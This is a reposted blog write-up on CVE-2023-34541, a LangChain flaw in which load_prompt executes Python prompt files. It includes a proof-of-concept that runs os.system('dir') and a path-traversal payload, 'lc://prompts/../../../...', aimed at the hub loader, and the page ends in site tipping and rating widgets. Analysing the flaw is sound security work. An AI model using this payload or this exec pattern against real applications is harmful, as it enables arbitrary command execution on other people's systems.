LangChain Arbitrary Command Execution - CVE-2023-34541

 

Vulnerability Introduction

LangChain is a framework for developing applications driven by language models.

In the affected version of LangChain, because the load_prompt function does not perform security filtering on the loaded content when loading the prompt file, an attacker can induce users to load the file by constructing a prompt file containing malicious commands, which can cause Arbitrary system commands to be executed.

​​​​​​​​

 Source:- https://tutorialboy24.blogspot.com/2023/07/langchain-arbitrary-command-execution.htmlicon-default.png?t=N6B9https://tutorialboy24.blogspot.com/2023/07/langchain-arbitrary-command-execution.html

Vulnerability Recurrence

Write under project test.py

from  langchain . prompts  import  load_prompt 
if  __name__  ==  '__main__' : loaded_prompt = load_prompt ( "system.py" )

system.py Write and execute system commands in the same directory dir

import  os 
os . system ( "dir" )

Run test.py returns dir the result of executing a system command

Image description

Vulnerability Analysis: -_load_prompt_from_file

langchain.prompts.loading.load_prompt

Image description

try_load_from_hub is trying to remotely load a file from a given path but because we are loading a local file, the next step is to jump to loadprompt_from_file

langchain.prompts.loading._load_prompt_from_file

Image description

According to loadprompt_from_file to the suffix of the file, when the suffix is ​​.py the file will be read and used exec to execute

That is to say, the code can be abbreviated as

if  __name__  ==  '__main__' : file_path = "system.py" with open ( file_path , "rb" ) as f : exec ( f . read ())

Vulnerability Analysis:- try_load_from_hub

Because of the network, there has been no way to reproduce the success, here is a detailed analysis of the code level

from langchain.prompts import load_prompt _ _

if  __name__  ==  '__main__' : loaded_prompt = load_prompt ( "lc://prompts/../../../../../../../system.py" )

langchain.prompts.loading.load_prompt

Image description

langchain.utilities.loading.try_load_from_hub

Image description

It is matched first HUB_PATH_RE = re.compile(r"lc(?Pref@[^:]+)?://(?Ppath. )"), so the need to satisfy the initial is **lc:// *Then match the following content, requiring the value of the first field to prompt the last suffix {'py', 'ya ml', 'json'} in

Image description

Finally, the url of the splicing request can ../../../ point to the file we set by bypassing the restrictions of the project, and read and load to realize arbitrary command execution

Vulnerability Summary

Trying on the latest version, this vulnerability still exists. The essence of this vulnerability is that it can load and execute local or specified Python files, but this problem should not be so easy to exploit in practical applications, because the address of the Python file must be controllable just to work.

Support Links


Source:- https://tutorialboy24.blogspot.com/2023/07/langchain-arbitrary-command-execution.htmlicon-default.png?t=N6B9https://tutorialboy24.blogspot.com/2023/07/langchain-arbitrary-command-execution.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值